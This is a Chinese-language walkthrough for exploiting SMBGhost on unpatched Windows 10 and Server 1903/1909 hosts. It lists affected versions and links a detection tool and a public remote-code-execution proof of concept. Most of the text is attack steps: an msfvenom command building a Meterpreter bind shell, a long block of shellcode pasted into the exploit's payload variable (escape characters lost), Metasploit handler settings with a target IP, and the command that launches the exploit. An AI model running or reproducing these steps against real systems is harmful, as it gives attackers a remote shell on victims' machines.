释放双眼,带上耳机,听听看~!
影響版本:
適用於32位系统的Windows 10版本1903
Windows 10 1903版
Windows Server 1903版
適用於32位系统的Windows 10版本1909
Windows 10版本1909
Windows 10 1909版
Windows Server版本1909
檢測工具:
https://github.com/ollypwn/SMBGhost
EXP:
https://github.com/chompie1337/SMBGhost_RCE_PoC
MSF利用:
msfvenom -p windows/x64/meterpreter/bind_tcp lport=1234 -f py -o shellcode.txt
將生成的shellcode替換exploit.py中的USER_PAYLOAD
USER_PAYLOAD = b"" | USER_PAYLOAD += b"xfcx48x83xe4xf0xe8xc0x00x00x00x41x51x41" | USER_PAYLOAD += b"x50x52x51x56x48x31xd2x65x48x8bx52x60x48" | USER_PAYLOAD += b"x8bx52x18x48x8bx52x20x48x8bx72x50x48x0f" | USER_PAYLOAD += b"xb7x4ax4ax4dx31xc9x48x31xc0xacx3cx61x7c" | USER_PAYLOAD += b"x02x2cx20x41xc1xc9x0dx41x01xc1xe2xedx52" | USER_PAYLOAD += b"x41x51x48x8bx52x20x8bx42x3cx48x01xd0x8b" | USER_PAYLOAD += b"x80x88x00x00x00x48x85xc0x74x67x48x01xd0" | USER_PAYLOAD += b"x50x8bx48x18x44x8bx40x20x49x01xd0xe3x56" | USER_PAYLOAD += b"x48xffxc9x41x8bx34x88x48x01xd6x4dx31xc9" | USER_PAYLOAD += b"x48x31xc0xacx41xc1xc9x0dx41x01xc1x38xe0" | USER_PAYLOAD += b"x75xf1x4cx03x4cx24x08x45x39xd1x75xd8x58" | USER_PAYLOAD += b"x44x8bx40x24x49x01xd0x66x41x8bx0cx48x44" | USER_PAYLOAD += b"x8bx40x1cx49x01xd0x41x8bx04x88x48x01xd0" | USER_PAYLOAD += b"x41x58x41x58x5ex59x5ax41x58x41x59x41x5a" | USER_PAYLOAD += b"x48x83xecx20x41x52xffxe0x58x41x59x5ax48" | USER_PAYLOAD += b"x8bx12xe9x57xffxffxffx5dx49xbex77x73x32" | USER_PAYLOAD += b"x5fx33x32x00x00x41x56x49x89xe6x48x81xec" | USER_PAYLOAD += b"xa0x01x00x00x49x89xe5x49xbcx02x00x7ax69" | USER_PAYLOAD += b"xc0xa8x8ex01x41x54x49x89xe4x4cx89xf1x41" | USER_PAYLOAD += b"xbax4cx77x26x07xffxd5x4cx89xeax68x01x01" | USER_PAYLOAD += b"x00x00x59x41xbax29x80x6bx00xffxd5x50x50" | USER_PAYLOAD += b"x4dx31xc9x4dx31xc0x48xffxc0x48x89xc2x48" | USER_PAYLOAD += b"xffxc0x48x89xc1x41xbaxeax0fxdfxe0xffxd5" | USER_PAYLOAD += b"x48x89xc7x6ax10x41x58x4cx89xe2x48x89xf9" | USER_PAYLOAD += b"x41xbax99xa5x74x61xffxd5x48x81xc4x40x02" | USER_PAYLOAD += b"x00x00x49xb8x63x6dx64x00x00x00x00x00x41" | USER_PAYLOAD += b"x50x41x50x48x89xe2x57x57x57x4dx31xc0x6a" | USER_PAYLOAD += b"x0dx59x41x50xe2xfcx66xc7x44x24x54x01x01" | USER_PAYLOAD += b"x48x8dx44x24x18xc6x00x68x48x89xe6x56x50" | USER_PAYLOAD += b"x41x50x41x50x41x50x49xffxc0x41x50x49xff" | USER_PAYLOAD += b"xc8x4dx89xc1x4cx89xc1x41xbax79xccx3fx86" | USER_PAYLOAD += b"xffxd5x48x31xd2x48xffxcax8bx0ex41xbax08" | USER_PAYLOAD += b"x87x1dx60xffxd5xbbxf0xb5xa2x56x41xbaxa6" | USER_PAYLOAD += b"x95xbdx9dxffxd5x48x83xc4x28x3cx06x7cx0a" | USER_PAYLOAD += b"x80xfbxe0x75x05xbbx47x13x72x6fx6ax00x59" | USER_PAYLOAD += b"x41x89xdaxffxd5"
msf5 > use exploit/multi/handler msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/bind_tcp msf5 exploit(multi/handler) > set rhost 192.168.1.123 #目標IP msf5 exploit(multi/handler) > set lport 1234 msf5 exploit(multi/handler) > exploit
後續:
進入EXP文件目錄,執行exp文件
python3 exploit.py ip 192.168.31.124 #本機IP